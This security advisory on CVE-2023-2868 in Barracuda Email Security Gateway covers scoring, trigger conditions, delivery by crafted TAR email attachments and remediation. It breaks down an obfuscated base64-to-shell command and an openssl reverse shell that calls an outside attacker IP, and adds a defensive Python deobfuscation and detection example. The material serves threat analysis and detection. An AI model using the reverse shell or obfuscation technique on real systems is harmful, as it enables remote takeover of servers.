  This vulnerability could be exploited by a remote, unauthenticated attacker by sending a specially crafted TAR file to the targeted device. A successful attack could result in a reverse shell against the targeted server, thus compromising its security.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-2868.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is unchanged.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.8 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  Inside the TAR file, you will see the following string:
  
  The script provided is a shell command that decodes a base64 encoded string and then executes the result. Here’s a detailed breakdown of what the command does:

  • abcdefg=: This sets the variable abcdefg to a base64 encoded string.
  • ee=ba: This sets the variable ee to the string ba.
  • G=s: This sets the variable G to the string s.
  • "ech"o $abcdefg|${ee}se64 -d|${G}h: This part of the command is using some obfuscation. If we substitute ee with ba and G with s, we get "ech"o $abcdefg | base64 -d | sh.
    1. "ech"o $abcdefg: This echoes the base64 encoded string stored in abcdefg.
    2. base64 -d: This decodes the base64 encoded string.
    3. sh: This executes the resulting decoded command string using sh.
  • wh66489.txt: This command doesn’t seem to have any context related to the rest of the script and it doesn’t appear to be a valid command by itself. If it was intended to redirect the output to a file named wh66489.txt, then it would require a > before the filename like this > wh66489.txt.

  If we decode the base64 string abcdefg using the command "ech"o $abcdefg | base64 -d, we get:

  This command is creating a reverse shell that connects to a specified host 107.148.223.196:443 over a secure SSL/TLS connection.

  The breakdown of the reverse shell commands:

  • setsid: This command is used to run a new session in Unix and Unix-like operating systems. This ensures that the command continues running even if the terminal is closed.
  • sh -c: The sh -c command is used to run a shell (sh) with a command string (-c option). Here, the string within the quotes is the command string that sh is going to execute.
  • mkfifo /tmp/p: The mkfifo command creates a named pipe with the name /tmp/p. Pipes are used to direct the output from one command as input to another. Named pipes, like /tmp/p, can be used by multiple processes for communication.
  • sh -i < /tmp/p 2>&1|openssl s_client -quiet -connect 107.148.223.196:443 > /tmp/p 2>/dev/null: This is a compound command.
    1. sh -i < /tmp/p 2>&1: The sh -i command starts an interactive shell. The < /tmp/p redirects the input of this shell from the named pipe we created earlier.
    2. The 2>&1 redirects standard error (2) to standard output (1).
    3. Therefore, both the error messages and standard output from the sh -i command are sent to the pipe /tmp/p.
    4. The | character pipes the output from the preceding command as the input to the next command.
    5. openssl s_client -quiet -connect 107.148.223.196:443: The openssl s_client command starts a SSL/TLS client that connects to an SSL/TLS server. The -quiet option suppresses most of the output. The -connect option specifies the host and port to connect to, here 107.148.223.196:443.
    6. > /tmp/p 2>/dev/null: This part is redirecting the standard output to the named pipe (/tmp/p) and discarding the standard error by directing it to /dev/null.
  • rm /tmp/p: Finally, after the connection is terminated, this command removes the named pipe /tmp/p.

  The overall purpose of this command is to create a reverse shell that connects to the specified host 107.148.223.196:443 over a secure SSL/TLS connection. Because of the setsid command, the connection survives even if the terminal is closed.
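
  The substitution steps described above can be automated for triage. The following Python is an added example (not code from the advisory or from Barracuda): it resolves the variable assignments and the quote-splicing in a constructed sample of the same shape, then checks whether the recovered pipeline decodes base64 straight into a shell, which is the pattern to alert on. The base64 value is a placeholder token, the sample string is constructed, and the function names are this example's own:

```python
import re
from typing import Dict, List

# Constructed sample modelled on the obfuscation described above; the base64
# blob is a placeholder token, not the real payload.
SAMPLE = 'abcdefg=PLACEHOLDER_BASE64;ee=ba;G=s;"ech"o $abcdefg|${ee}se64 -d|${G}h'

ASSIGN_RE = re.compile(r"^([A-Za-z_][A-Za-z0-9_]*)=(\S*)$")   # name=value, no spaces
VAR_RE = re.compile(r"\$\{?([A-Za-z_][A-Za-z0-9_]*)\}?")      # $name or ${name}
DECODER_RE = re.compile(r"\bbase64\b.*\s(-d|--decode)(\s|$)")
SHELLS = ("sh", "bash", "dash", "zsh")


def deobfuscate(cmd: str) -> Dict[str, object]:
    """Collect simple ';'-separated assignments, drop quote-splicing such as
    "ech"o, and expand every variable reference whose value was assigned."""
    env: Dict[str, str] = {}
    stages: List[str] = []
    for piece in cmd.split(";"):
        piece = piece.strip()
        m = ASSIGN_RE.match(piece)
        if m:
            env[m.group(1)] = m.group(2)
        elif piece:
            stages.append(piece)
    body = ";".join(stages)
    body = re.sub(r'"([^"]*)"', r"\1", body)          # "ech"o -> echo
    body = VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), body)
    return {"command": body, "variables": env}


def is_decode_and_execute(command: str) -> bool:
    """True when some pipeline stage is a base64 decode whose output is piped
    directly into a shell interpreter."""
    stages = [s.strip() for s in command.split("|")]
    for decoder, consumer in zip(stages, stages[1:]):
        words = consumer.split()
        if DECODER_RE.search(decoder) and words and words[0] in SHELLS:
            return True
    return False


def analyze(cmd: str) -> Dict[str, object]:
    """Deobfuscate first, then classify the recovered pipeline."""
    result = deobfuscate(cmd)
    result["decode_and_execute"] = is_decode_and_execute(str(result["command"]))
    return result


if __name__ == "__main__":
    print(analyze(SAMPLE))
```

  Running the classifier on the raw string returns False, because the `base64` and `sh` tokens only exist after expansion; that is exactly why a detection that matches on literal command names needs the variable-resolution step in front of it.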

Triggering the Problem:

  • The target system must be running Barracuda Email Security Gateway version 5.1.3.001 through 9.2.0.006.
  • The attacker must have network connectivity to the affected ports.
  • The attacker must send malicious attachments designed to exploit CVE-2023-2868 to gain initial access.

Triggering Conditions:

  For emails targeting Barracuda Email Security Gateway middleboxes and transmitted over SMTP or ESMTP, it is crucial to attach files with the extension ".tar" in their filename. Alternatively, using other extensions such as ".jpg" or ".dat" is acceptable, as long as they contain valid ".tar" file content for exploitation.

  Note that ".tar" file attachments crafted as valid exploits have the potential to execute a reverse shell payload on certain ESG appliances during the email attachment screening process.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • SMTP
    • ESMTP
  Exploit-chain-related malware components are installed over HTTP/HTTPS.

  Reverse Shell File Content:

SonicWall Capture Labs provides protection against this threat:

  • GAV: 18479 CVE-2023-2868.A

  • GAV: 17928 Saltwater.A

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Filtering traffic based on the signature above.
    • Upgrading the product to a non-vulnerable version.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory #1
  Vendor Advisory #2